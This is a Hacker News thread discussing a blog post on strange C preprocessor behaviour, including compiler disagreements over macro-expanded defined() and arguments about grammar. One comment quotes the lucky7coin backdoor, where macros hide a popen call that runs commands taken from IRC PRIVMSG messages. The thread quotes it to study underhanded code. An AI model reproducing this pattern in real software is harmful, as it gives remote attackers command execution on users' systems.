
Scandalous Weird Old Things About the C Preprocessor - robertelder
http://blog.robertelder.org/7-weird-old-things-about-the-c-preprocessor/
======
pjc50
The C preprocessor is a horrendous way of doing metaprogramming that was
implemented because it was relatively easy to do as a separate pass. There's a
reason why very few other languages have done it this way.

A good knowledge of the preprocessor is essential for writing obfuscated and
underhanded C. For example, the lucky7coin backdoor:
[https://github.com/alerj78/lucky7coin/issues/1](https://github.com/alerj78/lucky7coin/issues/1)
where the code

    
    
      if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
      {
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    

expands to

    
    
      if (vWords[1] == "PR" "IV" "M" "SG" && vWords[3] == ":!" && vWords[0].size() > 1)
      {
        FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");

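A minimal sketch of the mechanism, assuming a hypothetical definition of `CBuff` (the actual `#define` lines from the repository are not reproduced here). The macro hides a run of adjacent string literals, which the compiler merges into a single literal after preprocessing:

```c
#include <assert.h>
#include <string.h>

/* Hypothetical definition for illustration; not copied from the repository. */
#define CBuff "PR" "IV" "M" "SG"

/* Adjacent string literals are merged into one literal after macro
   expansion, so CBuff has the same size as "PRIVMSG". */
static_assert(sizeof(CBuff) == sizeof("PRIVMSG"), "CBuff spells PRIVMSG");

/* Returns 1 when word equals the string hidden behind the macro. */
int matches_cbuff(const char *word)
{
    return strcmp(word, CBuff) == 0;
}
```

Running a file like this through `cc -E` prints the expanded text, which is where the split string becomes visible.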
~~~
DSMan195276
IMO, whether or not the C preprocessor is good depends on what you're trying
to do and how you do it. I doubt there are any preprocessors or macro systems
that can't be used to obfuscate code - That's basically the definition of what
they do, modify your code before you compile it. Obviously, any
strange/unexplained preprocessor usage should be examined and preferably
removed.

The example you gave is not really fair though, because it seems pretty
obvious to me that nobody ever looked at that code - it hardly matters they
hid the backdoor in the C preprocessor. If you take a look at the repo,
it only has three commits - With the first one
([https://github.com/alerj78/lucky7coin/commit/07d7e5fc53e5673...](https://github.com/alerj78/lucky7coin/commit/07d7e5fc53e56736643a73d8a13ff4f74c118b3b))
being a supposed import of the code from the repo it used to exist in, and
it's in this commit where the backdoor was inserted. The real issue is that
people were running code from someone who appears to be a complete unknown,
has no history for his code, and just assumed it was the same as the old code
without checking.

~~~
mrbrowning
Preprocessors are uniquely problematic in this regard, though, since they're
just simple text-substitution engines. Things like templating (as in C++), in-
language macros (as in Lisp variants), or language-level metaprogramming
facilities (as in Ruby, Python, ...) all have access to actual entities in the
language, which constrains their effects in a way that's safer and easier to
reason about.

~~~
DSMan195276
I'm not looking to deny that straight text-substitution has its drawbacks,
you're completely right. But that being said, I still don't see it as big of a
deal as it seems. Generally speaking, bad/malicious pre-processor abuse like
this sticks out like a sore thumb when you're reviewing code. If you don't
have anybody reviewing the code then it doesn't really matter how you
disguised it. At least with the C preprocessor, if there's something you're
unsure about, you can run the preprocessor separately and look at the output,
clearing up all doubt over what it does.

Also worth noting, one of the nicer things about the design of the C
preprocessor is that it can be applied to a lot of different file-types. In
more complicated low-level C projects, you can run the preprocessor over your
C code, assembly code, linker scripts, etc., which is a huge gain since you
can have access to all your constants and simple macros, simplifying work and
reducing duplication. You can't get that with something tied to the language,
which is unfortunate, because like you said it's better to avoid the
preprocessor, since writing things at the language level makes them much
easier to reason about.

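A rough sketch of that kind of shared header, with made-up names (`KERNEL_STACK_SIZE`, `KERNEL_LOAD_ADDR`, and `kernel_stack_size` are all hypothetical). GCC documents `__ASSEMBLER__` as predefined when it preprocesses assembly; for a linker script you would presumably have to pass a similar guard macro yourself with `-D`, which is an assumption about the build setup:

```c
#include <assert.h>

/* Plain constants: safe to expand in C, assembly, and linker scripts. */
#define KERNEL_STACK_SIZE 0x4000
#define KERNEL_LOAD_ADDR  0x100000

#ifndef __ASSEMBLER__
/* C-only declarations, hidden from the assembler pass. */
#include <stddef.h>

static_assert(KERNEL_STACK_SIZE % 16 == 0, "stack size must stay aligned");

size_t kernel_stack_size(void)
{
    return KERNEL_STACK_SIZE;
}
#endif
```

The constants are defined once and every file type that goes through the preprocessor sees the same values.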
------
evmar
Here's one I recently learned about:

[http://reviews.llvm.org/D15866](http://reviews.llvm.org/D15866)

    
    
        #define FOO
        #define BAR defined(FOO)
        #if BAR
        ...
        #else
        ...
        #endif
    

clang and gcc will pick the #if branch while Visual Studio will take the #else
branch.

~~~
nkurz
This doesn't seem quite right. Did you maybe mean "#undef FOO" or
"!defined(FOO)"? Whether BAR gets expanded or not, in your example it looks
like it would always evaluate true. Or am I misunderstanding the ambiguity?

It might be telling that I also don't understand the Clang bug report as
written. I think there are typos in the examples. Is the switch from
"HAVE_FOO_BAR" to "HAVE_FOO" in the first example intentional? Is the
construct "#defined" (with a final 'd') intentional in the second?

~~~
evmar
I'm not sure -- I'm going off what the Clang bug says. They have a spec ref in
there. (Note that you can't trust your intuition on how compilers work, you
can only trust the spec and experiments.)

If it helps any here is the real-world code where this problem came up:

[https://codereview.chromium.org/1584203002/](https://codereview.chromium.org/1584203002/)

Edit: another reference:
[https://gcc.gnu.org/onlinedocs/cpp/Defined.html#Defined](https://gcc.gnu.org/onlinedocs/cpp/Defined.html#Defined)
"If the defined operator appears as a result of a macro expansion, the C
standard says the behavior is undefined."

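One way to sidestep the undefined case, sketched here with the same `FOO` and `BAR` names (this is an illustration, not necessarily what the linked Chromium change does): evaluate `defined` directly in an `#if`, where its meaning is specified, and store the result as a plain 0 or 1.

```c
#include <assert.h>

#define FOO

/* defined() appears literally in the #if, not via macro expansion. */
#if defined(FOO)
#define BAR 1
#else
#define BAR 0
#endif

#if BAR
static_assert(BAR == 1, "BAR is an ordinary integer constant here");
int bar_branch(void) { return 1; }
#else
int bar_branch(void) { return 0; }
#endif
```

With this form `BAR` expands to an integer constant, so every conforming preprocessor should pick the same branch.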
~~~
nkurz
OK, I've now tested. For this test code:

    
    
      #define FOO
      #define BAR defined(FOO)
      #if BAR
      #error "true"
      #else
      #error "false"
      #endif
    

Clang, GCC, and ICC evaluate the "true" branch, while MSVC evaluates the
"false" branch.

For the same test code with first line changed to "undef":

    
    
      #undef FOO
      #define BAR defined(FOO)
      #if BAR
      #error "true"
      #else
      #error "false"
      #endif
    

MSVC, Clang, GCC, and ICC all agree on "false".

Importantly, though, when used with "/Wall", MSVC gives this warning in
both cases:

    
    
      main.cpp(3): warning C4668: 'definedFOO' is not defined as
         a preprocessor macro, replacing with '0' for '#if/#elif'
    

None of the other three compilers give any warnings even with "-Wall -Wextra
-pedantic". So there definitely is a difference in behavior, but I don't think
it's actually the one that's presumed in that bug.

For further experimentation, Clang, GCC, and ICC can be tested online here:
[http://gcc.godbolt.org/](http://gcc.godbolt.org/)

And MSVC can be tested online here:
[http://webcompiler.cloudapp.net/](http://webcompiler.cloudapp.net/)

~~~
bla2
According to the link posted by evmar, clang warns on this starting at
r258128.

------
colanderman
#2 is incorrect. Being sensitive to line breaks does not make a grammar
context-sensitive. It just means you have to treat line breaks as tokens
rather than ignorable whitespace (which is exactly what the context-free
grammar given in the C11 standard does).

Same with the bit about concatenating tokens. Every single one of those
examples has a static parse tree, which, for the C _preprocessor_ , is a
sequence of tokens and directives. The author seems to be confusing the
preprocessor's parse tree with the effect it has on the underlying text.

(Yes, the _output_ of the preprocessor is dependent on what you define, but
that has nothing to do with the _grammar_. What the author claims is like
saying a Lisp is context-sensitive because the factorial function produces
different values for different inputs!)

Now, if you could do _this_ :

    
    
        #define foobar define
        #foobar x 123
        x
    

and get "123", _that_ would be a context-sensitive grammar. But that is NOT a
thing you can do!

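A small sketch of why that fails, using hypothetical helper macros (`STR`, `STR_`, `LOOKS_LIKE_DIRECTIVE`): the result of a macro expansion is never processed as a directive, even when it resembles one. Stringifying the expansion shows the tokens are there, yet `x` never becomes a macro.

```c
#include <assert.h>
#include <string.h>

#define STR_(tokens) #tokens
#define STR(tokens) STR_(tokens)   /* expand the argument, then stringify */

#define foobar define
#define LOOKS_LIKE_DIRECTIVE # foobar x 123

/* The expansion contains '#', 'define', 'x', '123' as ordinary tokens. */
const char *expanded_text(void)
{
    return STR(LOOKS_LIKE_DIRECTIVE);
}

/* Reports whether a macro named x exists at this point in the file. */
int x_is_a_macro(void)
{
#ifdef x
    return 1;
#else
    return 0;
#endif
}
```

Exact spacing in the stringified text may vary between preprocessors, so the sketch only relies on the word `define` appearing in it.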
------
breadbox
I hate to say it, but I was rather unimpressed by this list, and nothing in it
surprised me. While I certainly agree that the C preprocessor is a relic, and
has not weathered the test of time well, I would suggest that a number of the
supposed infelicities mentioned in this article stem from the misleading idea
that the preprocessor is an integral part of the C language proper, when it is
better thought of as its own language (and one that was traditionally done by
a completely separate program). The preprocessor does things differently than
the rest of C, because it's not C. It is a text-processing language of
convenience, provided specifically for doing things that C itself cannot (or
should not) do.

~~~
robertelder
I'll try harder next time.

------
TazeTSchnitzel
Relatedly, C is a purely functional programming language:

[http://conal.net/blog/posts/the-c-language-is-purely-
functio...](http://conal.net/blog/posts/the-c-language-is-purely-functional)

------
pklausler
I've written a C preprocessor and I agree that the language standard documents
are ambiguous and incomplete. The best I could do was hack on it until it
matched GCC's preprocessor well enough to compile Linux.

I don't recall all the horrid details, but one case that I do remember driving
me nuts was the use of #if/#endif in the argument to a function-like macro.

------
DubiousPusher
Has there been any notion of a replacement Meta/Macro language for C?
Something open source. Of course pre-preprocessing one's files and the
complexity that might add to the build system are unattractive but I'd still
be interested if someone has attacked this problem.

~~~
ctstover
My school of thought would be to limit it to just #include, #if, #else, #endif,
and non-recursive single word only #define / #undef. Force everything to be 1
per single line, and call it a day.

Macros should always be the absolute last resort to doing anything. Stepping
through code in gdb with some "creative" macro-based API is almost as bad as
C++.

~~~
ArkyBeagle
I've seen 'C' macros used to do template-ey things that probably reinforced
the readability of the code (once you get used to the fact that the macros
were there at all).

More modern compilers allow using non-static "const" constructs to do much of
the same, which is a great improvement.

To wit:

    #define in_bounds(lower,x,upper) (((x) < (upper)) && ((x) > (lower)))

vs.

    const bool in_bounds = ((x > lower) && (x < upper));

Macros can be used effectively for reduction in strength, so long as you're
not too clever about it.

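A sketch of the trade-off, swapping in a `static inline` function as the non-macro alternative (not the `const` form above) and using a hypothetical `next_value` helper to count evaluations. The macro evaluates its middle argument twice, the function once:

```c
#include <assert.h>
#include <stdbool.h>

/* Macro form with every argument parenthesized. */
#define IN_BOUNDS(lower, x, upper) (((x) < (upper)) && ((x) > (lower)))

/* Function form: each argument is evaluated exactly once. */
static inline bool in_bounds(int lower, int x, int upper)
{
    return x > lower && x < upper;
}

static int calls;                      /* counts next_value() invocations */
static int next_value(void) { ++calls; return 5; }

int evaluations_with_macro(void)
{
    calls = 0;
    bool r = IN_BOUNDS(0, next_value(), 10);   /* x appears twice in the body */
    (void)r;
    return calls;
}

int evaluations_with_function(void)
{
    calls = 0;
    bool r = in_bounds(0, next_value(), 10);
    (void)r;
    return calls;
}
```

The function version also shows up as a normal frame in a debugger, which speaks to the gdb complaint upthread.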
------
cyphar
I'm 95% sure the last example in #3 is undefined behaviour. #(a b c) is not
valid, so evaluating it with multiple levels of indirection probably is a
compiler bug for not erroring out.

~~~
cyphar
And the last 3 or 4 are odd, but were needed for some of the hacks used in
the early days of C (and some are almost certainly used in the Linux kernel
source today).

------
biot
Kind of click-baity, no? Though the title is missing "You won't believe what
happens next... developers hate it!"

